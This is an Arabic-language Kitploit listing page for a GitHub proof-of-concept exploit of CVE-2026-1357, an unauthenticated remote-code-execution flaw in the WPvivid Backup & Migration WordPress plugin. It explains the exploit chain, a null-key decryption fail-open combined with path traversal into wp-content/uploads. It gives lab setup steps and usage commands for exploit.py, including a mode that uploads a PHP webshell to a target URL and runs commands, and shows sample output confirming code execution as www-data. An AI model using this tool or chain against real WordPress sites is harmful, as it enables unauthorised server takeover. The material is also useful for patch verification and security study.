Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1357 — CVE-2026-1357 — استغلال RCE بدون مصادقة في WPvivid Backup & Migration ≤ 0.9.123 | Kitploit
أدوات/GitHubGitHub/halilkirazkaya/cve-2026-1357
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubhalilkirazkaya/cve-2026-1357

CVE-2026-1357

CVE-2026-1357 — استغلال RCE بدون مصادقة في WPvivid Backup & Migration ≤ 0.9.123

عرض المستودع
143منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-1357 — WPvivid Backup & Migration RCE

رفع ملفات تعسفي غير مصادَق عليه → تنفيذ أكواد عن بُعد

الحقلالقيمة
CVECVE-2026-1357
CVSS9.8 (حرجة)
الإضافةWPvivid Backup & Migration
المتأثر≤ 0.9.123
المُصحَّحة0.9.124
اكتشفهاLucas Montes (NiRoX)
PoC بواسطةhalilkirazkaya

نظرة عامة

يحتوي المكوّن الإضافي WPvivid Backup & Migration (≤ 0.9.123) على ثغرة أمنية حرجة تسمح لـمهاجم غير مصادَق برفع ملفات PHP تعسفية إلى الخادم، مما يؤدي إلى تنفيذ أكواد عن بُعد (RCE).

تجمع سلسلة الاستغلال بين خطأين:

1. فشل التشفير المفتوح (Cryptographic Fail-Open)

يتعامل المكوّن الإضافي مع نقل النسخ الاحتياطية عن بُعد عبر خطاف wpvivid_action=send_to_site. عند فك تشفير مفتاح الجلسة، تُرجع الدالة openssl_private_decrypt() القيمة false لمفتاح RSA غير صالح. لا يقوم المكوّن الإضافي بالتحقق من هذه القيمة ويمرّر false إلى Crypt_Rijndael من مكتبة phpseclib v1، التي تتعامل معها على أنها مفتاح فارغ بطول 16 بايت (\x00 × 16) مع وضع CBC وIV فارغ.

2. اجتياز المسار (Path Traversal)

معامل name في حمولة JSON المُفكَّك تشفيرها غير مُنقّى. يمكن للمهاجم استخدام تسلسلات ../ لكتابة ملف PHP خارج دليل النسخ الاحتياطي المقيد إلى الدليل المتاح للعموم wp-content/uploads/.

القيد

يجب أن تكون wpvivid_api_token قد أُنشئت في إعدادات المكوّن الإضافي وألا تكون منتهية الصلاحية.


الإعداد

1. تنزيل المكوّن الإضافي المُعرَّض

قم بتنزيل وفك ضغط WPvivid Backup & Migration الإصدار 0.9.123 (النسخة المُعرَّضة):

root@kitploit:~
wget https://downloads.wordpress.org/plugin/wpvivid-backuprestore.0.9.123.zip
unzip wpvivid-backuprestore.0.9.123.zip

سيؤدي هذا إلى إنشاء الدليل wpvivid-backuprestore/ الذي يتم تركيبه داخل حاوية Docker عبر docker-compose.yml.

2. تشغيل البيئة التجريبية

root@kitploit:~
docker compose up -d

3. إعداد WordPress

  1. افتح http://localhost وأكمل تثبيت WordPress.
  2. انتقل إلى الإضافات → الإضافات المثبّتة وقم بتفعيل WPvivid Backup & Migration.
  3. انتقل إلى WPvivid → الإعدادات → الترحيل التلقائي وانقر على إنشاء لإنشاء مفتاح (هذا يفعّل مسار الكود المُعرَّض).

4. تثبيت التبعيات

root@kitploit:~
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# Check vulnerability only (uploads a harmless txt file and verifies MD5)
python3 exploit.py -u http://TARGET-URL -c

# Upload shell and run default command (id)
python3 exploit.py -u http://TARGET-URL -s

# Upload shell and run custom command
python3 exploit.py -u http://TARGET-URL -s "whoami"

مثال على المخرجات (وضع الفحص)

root@kitploit:~
[*] Target       : http://localhost/
[*] Mode         : Check
[*] Upload path  : ../uploads/h8xq9b3v2z1c.txt

[+] Generating encrypted payload (AES-128-CBC, null key + null IV)...
[+] Payload size : 392 bytes (base64)
[+] Sending exploit via wpvivid_action=send_to_site ...
[+] Response     : 200
[+] Body         : {"result":"success","op":"finished"}

[+] Verifying at: http://localhost/wp-content/uploads/h8xq9b3v2z1c.txt
[✓] Vulnerability Confirmed! File content matches MD5.

مثال على المخرجات (وضع الصدفة)

root@kitploit:~
[*] Target       : http://localhost/
[*] Mode         : Shell
[*] Upload path  : ../uploads/wp6h68xnt1tyzbfx8qp3qdbx.php
[*] Verify cmd   : id

[+] Generating encrypted payload (AES-128-CBC, null key + null IV)...
[+] Payload size : 392 bytes (base64)
[+] Sending exploit via wpvivid_action=send_to_site ...
[+] Response     : 200
[+] Body         : {"result":"success","op":"finished"}

[+] Verifying at: http://localhost/wp-content/uploads/wp6h68xnt1tyzbfx8qp3qdbx.php?cmd=id
[✓] RCE Confirmed!
[✓] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

المراجع

  • نشرة Wordfence الأمنية
  • إثبات المفهوم الأصلي بواسطة LucasM0ntes

إخلاء مسؤولية

تُقدَّم هذه الأداة لأغراض اختبار الأمان المصرّح به والتعليم فقط. الوصول غير المصرّح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها بمسؤولية.

تنزيل الأداة